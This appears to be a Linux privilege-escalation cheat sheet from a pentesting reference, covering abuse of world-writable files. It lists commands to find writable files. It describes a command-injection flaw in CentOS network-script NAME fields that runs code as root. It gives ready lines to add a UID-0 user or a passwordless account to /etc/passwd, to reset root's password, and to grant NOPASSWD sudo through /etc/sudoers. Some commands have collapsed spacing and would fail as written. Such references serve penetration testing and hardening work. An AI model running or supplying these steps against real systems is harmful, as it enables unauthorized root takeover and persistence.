Writable Files
List world writable files on the system.
find /-writable !-user `whoami`-type f !-path "/proc/*"!-path "/sys/*"-exec ls -al {} \; 2>/dev/null
find /-perm -2-type f 2>/dev/null
find /!-path "*/proc/*"-perm -2-type f -print 2>/dev/null
- Writable /etc/sysconfig/network-scripts/ (Centos/Redhat)
In my case, the NAME= attributed in these network scripts is not handled correctly. If you have white/blank space in the name the system tries to execute the part after the white/blank space. Which means; everything after the first blank space is executed as root.
/etc/sysconfig/network-scripts/ifcfg-1337 for example
NAME=Network /bin/id <=Note the blank space ONBOOT=yes DEVICE=eth0
EXEC : ./etc/sysconfig/network-scripts/ifcfg-1337
src : https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f
- Writable /etc/passwd
First generate a password with one of the following commands.
openssl passwd -1-salt hacker hackeropenssl passwd {password}mkpasswd -m SHA-512hackerpython2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Then add the user hacker and add the generated password.
hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
E.g: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
You can now use the su command with hacker:hacker
Alternatively you can use the following lines to add a dummy user without a password.
WARNING: you might degrade the current security of the machine.
echo 'dummy::0:0::/root:/bin/bash'>>/etc/passwd
su -dummy
Also you can modify root passord:
root:GENERATED_PASSWORD_HERE:0:0:root:/root:/bin/bash
su root (Then type the password you selected with openssl)
- Writable /etc/sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
To use SUDO without password
echo "username ALL=(ALL) NOPASSWD:ALL">>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash">>/etc/sudoers
Last updated